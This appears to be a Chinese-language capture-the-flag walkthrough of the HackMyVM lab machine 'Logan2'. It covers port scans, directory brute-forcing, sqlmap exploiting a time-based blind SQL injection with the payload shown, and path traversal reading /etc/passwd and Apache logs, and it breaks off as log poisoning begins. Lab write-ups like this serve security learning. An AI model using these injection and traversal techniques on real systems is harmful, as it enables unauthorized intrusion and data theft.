{"id":701,"date":"2024-06-28T22:44:50","date_gmt":"2024-06-28T14:44:50","guid":{"rendered":"http:\/\/162.14.82.114\/?p=701"},"modified":"2024-06-28T22:47:49","modified_gmt":"2024-06-28T14:47:49","slug":"hmv-_-logan2","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/701\/06\/28\/2024\/","title":{"rendered":"hmv[-_-]Logan2"},"content":{"rendered":"<h1>Logan2<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241775.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241775.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417195609809\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241776.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241776.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417195818979\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.0.145 -- -A<\/code><\/pre>\n<pre><code class=\"language-bash\">Open 192.168.0.145:22\nOpen 192.168.0.145:80\nOpen 192.168.0.145:3000\n\nPORT     STATE SERVICE REASON  VERSION\n22\/tcp   open  ssh     syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n|   256 10:ed:dd:ab:26:fd:f4:9f:28:1e:89:93:f4:58:16:ab (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDnjhFrlAMi06UbJbqL8vCRNan3Azij63mLg\/jbysc+PqRxSiiCv1\/imcjikQLi5SnnyY\/\/gRLa0EJz1D7kLWqk=\n|   256 43:3b:d9:8c:12:44:e9:92:be:cf:1a:78:fd:33:38:67 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIIyIpQI1VgDg\/IXP7Y+NR\/aiAmqxd5KGk\/ZQ8fL77eu\n80\/tcp   open  http    syn-ack Apache httpd 2.4.57 ((Debian))\n| http-methods: \n|_  Supported Methods: POST OPTIONS HEAD GET\n|_http-server-header: Apache\/2.4.57 (Debian)\n|_http-title: Logan\n3000\/tcp open  ppp?    syn-ack\n| fingerprint-strings: \n|   GenericLines, Help: \n|     HTTP\/1.1 400 Bad Request\n|     Content-Type: text\/plain; charset=utf-8\n|     Connection: close\n|     Request\n|   GetRequest: \n|     HTTP\/1.0 200 OK\n|     Content-Type: text\/html; charset=UTF-8\n|     Set-Cookie: lang=en-US; Path=\/; Max-Age=2147483647\n|     Set-Cookie: i_like_gitea=ba7e7fac344f9195; Path=\/; HttpOnly\n|     Set-Cookie: _csrf=LpphfML50jUpPn12TIh6yHGf2oI6MTcxMzM1NTE0Mzk4MDMxNzQ0Mw; Path=\/; Expires=Thu, 18 Apr 2024 11:59:03 GMT; HttpOnly\n|     X-Frame-Options: SAMEORIGIN\n|     Date: Wed, 17 Apr 2024 11:59:03 GMT\n|     &lt;!DOCTYPE html&gt;\n|     &lt;html lang=&quot;en-US&quot; class=&quot;theme-&quot;&gt;\n|     &lt;head data-suburl=&quot;&quot;&gt;\n|     &lt;meta charset=&quot;utf-8&quot;&gt;\n|     &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1&quot;&gt;\n|     &lt;meta http-equiv=&quot;x-ua-compatible&quot; content=&quot;ie=edge&quot;&gt;\n|     &lt;title&gt; Gitea: Git with a cup of tea &lt;\/title&gt;\n|     &lt;link rel=&quot;manifest&quot; href=&quot;\/manifest.json&quot; crossorigin=&quot;use-credentials&quot;&gt;\n|     &lt;meta name=&quot;theme-color&quot; content=&quot;#6cc644&quot;&gt;\n|     &lt;meta name=&quot;author&quot; content=&quot;Gitea - Git with a cup of tea&quot; \/&gt;\n|     &lt;meta name=&quot;description&quot; content=&quot;Gitea (Git with a cup of tea) is a painless\n|   HTTPOptions: \n|     HTTP\/1.0 404 Not Found\n|     Content-Type: text\/html; charset=UTF-8\n|     Set-Cookie: lang=en-US; Path=\/; Max-Age=2147483647\n|     Set-Cookie: i_like_gitea=e5135b915582dadc; Path=\/; HttpOnly\n|     Set-Cookie: _csrf=R4IXxzou684SHeT6Qv1ovgfY0oQ6MTcxMzM1NTE0OTAxNTMwNTM4Nw; Path=\/; Expires=Thu, 18 Apr 2024 11:59:09 GMT; HttpOnly\n|     X-Frame-Options: SAMEORIGIN\n|     Date: Wed, 17 Apr 2024 11:59:09 GMT\n|     &lt;!DOCTYPE html&gt;\n|     &lt;html lang=&quot;en-US&quot; class=&quot;theme-&quot;&gt;\n|     &lt;head data-suburl=&quot;&quot;&gt;\n|     &lt;meta charset=&quot;utf-8&quot;&gt;\n|     &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1&quot;&gt;\n|     &lt;meta http-equiv=&quot;x-ua-compatible&quot; content=&quot;ie=edge&quot;&gt;\n|     &lt;title&gt;Page Not Found - Gitea: Git with a cup of tea &lt;\/title&gt;\n|     &lt;link rel=&quot;manifest&quot; href=&quot;\/manifest.json&quot; crossorigin=&quot;use-credentials&quot;&gt;\n|     &lt;meta name=&quot;theme-color&quot; content=&quot;#6cc644&quot;&gt;\n|     &lt;meta name=&quot;author&quot; content=&quot;Gitea - Git with a cup of tea&quot; \/&gt;\n|_    &lt;meta name=&quot;description&quot; content=&quot;Gitea (Git with a c\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port3000-TCP:V=7.94SVN%I=7%D=4\/17%Time=661FB988%P=x86_64-pc-linux-gnu%r\nSF:(GenericLines,67,&quot;HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x\nSF:20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Ba\nSF:d\\x20Request&quot;)%r(GetRequest,2942,&quot;HTTP\/1\\.0\\x20200\\x20OK\\r\\nContent-Typ\nSF:e:\\x20text\/html;\\x20charset=UTF-8\\r\\nSet-Cookie:\\x20lang=en-US;\\x20Path\nSF:=\/;\\x20Max-Age=2147483647\\r\\nSet-Cookie:\\x20i_like_gitea=ba7e7fac344f91\nSF:95;\\x20Path=\/;\\x20HttpOnly\\r\\nSet-Cookie:\\x20_csrf=LpphfML50jUpPn12TIh6\nSF:yHGf2oI6MTcxMzM1NTE0Mzk4MDMxNzQ0Mw;\\x20Path=\/;\\x20Expires=Thu,\\x2018\\x2\nSF:0Apr\\x202024\\x2011:59:03\\x20GMT;\\x20HttpOnly\\r\\nX-Frame-Options:\\x20SAM\nSF:EORIGIN\\r\\nDate:\\x20Wed,\\x2017\\x20Apr\\x202024\\x2011:59:03\\x20GMT\\r\\n\\r\\\nSF:n&lt;!DOCTYPE\\x20html&gt;\\n&lt;html\\x20lang=\\&quot;en-US\\&quot;\\x20class=\\&quot;theme-\\&quot;&gt;\\n&lt;hea\nSF:d\\x20data-suburl=\\&quot;\\&quot;&gt;\\n\\t&lt;meta\\x20charset=\\&quot;utf-8\\&quot;&gt;\\n\\t&lt;meta\\x20name=\nSF:\\&quot;viewport\\&quot;\\x20content=\\&quot;width=device-width,\\x20initial-scale=1\\&quot;&gt;\\n\\t\nSF:&lt;meta\\x20http-equiv=\\&quot;x-ua-compatible\\&quot;\\x20content=\\&quot;ie=edge\\&quot;&gt;\\n\\t&lt;tit\nSF:le&gt;\\x20Gitea:\\x20Git\\x20with\\x20a\\x20cup\\x20of\\x20tea\\x20&lt;\/title&gt;\\n\\t&lt;l\nSF:ink\\x20rel=\\&quot;manifest\\&quot;\\x20href=\\&quot;\/manifest\\.json\\&quot;\\x20crossorigin=\\&quot;us\nSF:e-credentials\\&quot;&gt;\\n\\t&lt;meta\\x20name=\\&quot;theme-color\\&quot;\\x20content=\\&quot;#6cc644\\\nSF:&quot;&gt;\\n\\t&lt;meta\\x20name=\\&quot;author\\&quot;\\x20content=\\&quot;Gitea\\x20-\\x20Git\\x20with\\x\nSF:20a\\x20cup\\x20of\\x20tea\\&quot;\\x20\/&gt;\\n\\t&lt;meta\\x20name=\\&quot;description\\&quot;\\x20con\nSF:tent=\\&quot;Gitea\\x20\\(Git\\x20with\\x20a\\x20cup\\x20of\\x20tea\\)\\x20is\\x20a\\x20\nSF:painless&quot;)%r(Help,67,&quot;HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Typ\nSF:e:\\x20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x\nSF:20Bad\\x20Request&quot;)%r(HTTPOptions,206C,&quot;HTTP\/1\\.0\\x20404\\x20Not\\x20Found\nSF:\\r\\nContent-Type:\\x20text\/html;\\x20charset=UTF-8\\r\\nSet-Cookie:\\x20lang\nSF:=en-US;\\x20Path=\/;\\x20Max-Age=2147483647\\r\\nSet-Cookie:\\x20i_like_gitea\nSF:=e5135b915582dadc;\\x20Path=\/;\\x20HttpOnly\\r\\nSet-Cookie:\\x20_csrf=R4IXx\nSF:zou684SHeT6Qv1ovgfY0oQ6MTcxMzM1NTE0OTAxNTMwNTM4Nw;\\x20Path=\/;\\x20Expire\nSF:s=Thu,\\x2018\\x20Apr\\x202024\\x2011:59:09\\x20GMT;\\x20HttpOnly\\r\\nX-Frame-\nSF:Options:\\x20SAMEORIGIN\\r\\nDate:\\x20Wed,\\x2017\\x20Apr\\x202024\\x2011:59:0\nSF:9\\x20GMT\\r\\n\\r\\n&lt;!DOCTYPE\\x20html&gt;\\n&lt;html\\x20lang=\\&quot;en-US\\&quot;\\x20class=\\&quot;\nSF:theme-\\&quot;&gt;\\n&lt;head\\x20data-suburl=\\&quot;\\&quot;&gt;\\n\\t&lt;meta\\x20charset=\\&quot;utf-8\\&quot;&gt;\\n\\\nSF:t&lt;meta\\x20name=\\&quot;viewport\\&quot;\\x20content=\\&quot;width=device-width,\\x20initial\nSF:-scale=1\\&quot;&gt;\\n\\t&lt;meta\\x20http-equiv=\\&quot;x-ua-compatible\\&quot;\\x20content=\\&quot;ie=\nSF:edge\\&quot;&gt;\\n\\t&lt;title&gt;Page\\x20Not\\x20Found\\x20-\\x20\\x20Gitea:\\x20Git\\x20wit\nSF:h\\x20a\\x20cup\\x20of\\x20tea\\x20&lt;\/title&gt;\\n\\t&lt;link\\x20rel=\\&quot;manifest\\&quot;\\x20\nSF:href=\\&quot;\/manifest\\.json\\&quot;\\x20crossorigin=\\&quot;use-credentials\\&quot;&gt;\\n\\t&lt;meta\\x\nSF:20name=\\&quot;theme-color\\&quot;\\x20content=\\&quot;#6cc644\\&quot;&gt;\\n\\t&lt;meta\\x20name=\\&quot;autho\nSF:r\\&quot;\\x20content=\\&quot;Gitea\\x20-\\x20Git\\x20with\\x20a\\x20cup\\x20of\\x20tea\\&quot;\\x\nSF:20\/&gt;\\n\\t&lt;meta\\x20name=\\&quot;description\\&quot;\\x20content=\\&quot;Gitea\\x20\\(Git\\x20wi\nSF:th\\x20a\\x20c&quot;);\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.145\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.145\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,git,jpg,txt,png\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 278]\n\/javascript           (Status: 301) [Size: 319] [--&gt; http:\/\/192.168.0.145\/javascript\/]\n\/config.php           (Status: 200) [Size: 0]\n\/.php                 (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ sudo dirsearch -u http:\/\/192.168.0.145:3000\/ -e* -i 200,300-399 2&gt;\/dev\/null\n\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/temp\/Logan2\/reports\/http_192.168.0.145_3000\/__24-04-17_08-03-00.txt\n\nTarget: http:\/\/192.168.0.145:3000\/\n\n[08:03:00] Starting: \n[08:03:00] 302 -   26B  - \/js  -&gt;  \/js\n[08:04:25] 302 -   27B  - \/css  -&gt;  \/css\n[08:04:27] 200 -  160B  - \/debug\n[08:04:27] 200 -  160B  - \/debug\/\n[08:04:38] 302 -   29B  - \/fonts  -&gt;  \/fonts\n[08:04:47] 302 -   27B  - \/img  -&gt;  \/img\n[08:05:03] 200 -  670B  - \/manifest.json\n[08:05:36] 200 -    9KB - \/user\/login\/<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<pre><code class=\"language-apl\">Welcome!!!<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241777.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241777.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417200155353\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241778.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241778.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417200213315\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241779.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241779.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417200943219\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u4e00\u4e2a\u811a\u672c\uff1a<\/p>\n<pre><code class=\"language-javascript\">document.addEventListener(&quot;DOMContentLoaded&quot;, function() {\n    fetch(&#039;\/save-user-agent.php&#039;, {\n        method: &#039;POST&#039;,\n        body: JSON.stringify({ user_agent: navigator.userAgent }),\n        headers: {\n            &#039;Content-Type&#039;: &#039;application\/json&#039;\n        }\n    })\n    .then(response =&gt; {\n        if (response.ok) {\n            console.log(&#039;User-Agent saved successfully.&#039;);\n        } else {\n            console.error(&#039;Error saving User-Agent.&#039;);\n        }\n    })\n    .catch(error =&gt; {\n        console.error(&#039;Network error:&#039;, error);\n    });\n});\n<\/code><\/pre>\n<p>\u9700\u8981\u6211\u4eec\u53d1\u9001POST\uff0c\u6293\u5305\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">GET \/save-user-agent.php HTTP\/1.1\nHost: 192.168.0.145\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\nContent-Length: 23\n\n{\n    &quot;user_agent&quot;:&quot;1&quot;\n}<\/code><\/pre>\n<p>\u662f\u6709\u6b63\u5e38\u56de\u5e94\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">HTTP\/1.1 200 OK\nDate: Wed, 17 Apr 2024 12:22:15 GMT\nServer: Apache\/2.4.57 (Debian)\nContent-Length: 0\nConnection: close\nContent-Type: text\/html; charset=UTF-8<\/code><\/pre>\n<h3>sqlmap\u7206\u7834<\/h3>\n<p>\u5c1d\u8bd5sqlmap\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ sqlmap sql.txt\n        ___\n       __H__\n ___ ___[.]_____ ___ ___  {1.8.2#stable}\n|_ -| . [(]     | .&#039;| . |\n|___|_  [&quot;]_|_|_|__,|  _|\n      |_|V...       |_|   https:\/\/sqlmap.org\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user&#039;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 08:23:38 \/2024-04-17\/\n\n[08:23:48] [CRITICAL] host &#039;sql.txt&#039; does not exist\n\n[*] ending @ 08:23:48 \/2024-04-17\/<\/code><\/pre>\n<p>\u76f4\u63a5\u641e\uff0c\u8bc6\u522b\u4e0d\u51fa\u6765\uff0c\u5c1d\u8bd5\u4f7f\u7528\u522b\u7684\u65b9\u6cd5\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap --url http:\/\/192.168.0.145\/save-user-agent.php --method post --data &#039;{&quot;user_agent&quot;:&quot;param&quot;}&#039; --batch<\/code><\/pre>\n<pre><code class=\"language-apl\">sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:\n---\nParameter: JSON user_agent ((custom) POST)\n    Type: time-based blind\n    Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)\n    Payload: {&quot;user_agent&quot;:&quot;param&#039; AND (SELECT 7445 FROM (SELECT(SLEEP(5)))THpQ) AND &#039;rqhs&#039;=&#039;rqhs&quot;}\n---\n\nweb server operating system: Linux Debian\nweb application technology: Apache 2.4.57\nback-end DBMS: MySQL &gt;= 5.0.12 (MariaDB fork)<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap --url http:\/\/192.168.0.145\/save-user-agent.php --method post --data &#039;{&quot;user_agent&quot;:&quot;param&quot;}&#039; --batch --dbs<\/code><\/pre>\n<pre><code class=\"language-apl\">available databases [2]:\n[*] information_schema\n[*] logan<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap --url http:\/\/192.168.0.145\/save-user-agent.php --method post --data &#039;{&quot;user_agent&quot;:&quot;param&quot;}&#039; --batch -D logan --tables<\/code><\/pre>\n<pre><code class=\"language-apl\">Database: logan\n[3 tables]\n+----------+\n| browser  |\n| comments |\n| users    |\n+----------+<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap --url http:\/\/192.168.0.145\/save-user-agent.php --method post --data &#039;{&quot;user_agent&quot;:&quot;param&quot;}&#039; --batch -D logan -T users --columns<\/code><\/pre>\n<pre><code class=\"language-apl\">Database: logan\nTable: users\n[2 columns]\n+--------+--------------+\n| Column | Type         |\n+--------+--------------+\n| user   | varchar(255) |\n| email  | varchar(255) |\n+--------+--------------+<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap --url http:\/\/192.168.0.145\/save-user-agent.php --method post --data &#039;{&quot;user_agent&quot;:&quot;param&quot;}&#039; --batch -D logan -T users --dump<\/code><\/pre>\n<pre><code class=\"language-apl\">Database: logan\nTable: users\n[1 entry]\n+------------------------------+--------+\n| email                        | user   |\n+------------------------------+--------+\n| logan@newsitelogan.logan.hmv | logan  |\n+------------------------------+--------+<\/code><\/pre>\n<h3>\u6dfb\u52a0dns\u89e3\u6790<\/h3>\n<p>\u53d1\u73b0\u4e86\u4e00\u4e2adns\u89e3\u6790\uff1a<\/p>\n<pre><code class=\"language-apl\">192.168.0.145    newsitelogan.logan.hmv<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241780.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241780.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417204805628\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5230\u5904\u770b\u770b\uff0c\u6e90\u4ee3\u7801\u53d1\u73b0\uff1a<\/p>\n<pre><code class=\"language-bash\">&lt;!-- THE OLD WEBSITE WAS VERY UGLY LUCKILY WE HIRED NEW DESIGNERS --&gt;\n.......\n&lt;!-- &lt;img class=&quot;space-image&quot; src=&quot;\/photos-website-logan.php?photo=moon.png&quot;&gt; --&gt;\n.......\n&lt;!-- &lt;img class=&quot;space-image&quot; src=&quot;\/photos-website-logan.php?photo=mars.jpg&quot;&gt; --&gt;\n.......\n&lt;!-- &lt;img class=&quot;space-image&quot; src=&quot;\/photos-website-logan.php?photo=pleyades.jpg&quot;&gt; --&gt;<\/code><\/pre>\n<p>\u5c1d\u8bd5\u662f\u5426\u662fLFT\u6f0f\u6d1e\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/newsitelogan.logan.hmv\/\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\n<pre><code class=\"language-text\">root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:108:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nlogan:x:1000:1000:logan,,,:\/home\/logan:\/bin\/bash\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nmysql:x:103:112:MySQL Server,,,:\/nonexistent:\/bin\/false\ngit:x:104:113:Git Version Control,,,:\/home\/git:\/bin\/bash\nkevin:x:1001:1001:kevin,,,:\/home\/kevin:\/bin\/bash<\/code><\/pre>\n<h3>\u65e5\u5fd7\u6ce8\u5165<\/h3>\n<p>\u67e5\u770b\u53d1\u73b0<code>apache<\/code>\u7684\u65e5\u5fd7\u662f\u5f00\u542f\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/newsitelogan.logan.hmv\/\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/var\/log\/apache2\/access.log<\/code><\/pre>\n<pre><code class=\"language-text\">Logs are cleaned every minut\n192.168.0.143 - - [17\/Apr\/2024:07:54:12 -0500] &quot;GET \/\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/etc\/shadow HTTP\/1.1&quot; 200 203 &quot;http:\/\/newsitelogan.logan.hmv\/\/photos-website-logan.php?photo=\/config.php&quot; &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot;\n192.168.0.143 - - [17\/Apr\/2024:07:54:19 -0500] &quot;GET \/\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/etc\/passwd HTTP\/1.1&quot; 200 765 &quot;http:\/\/newsitelogan.logan.hmv\/\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/etc\/shadow&quot; &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 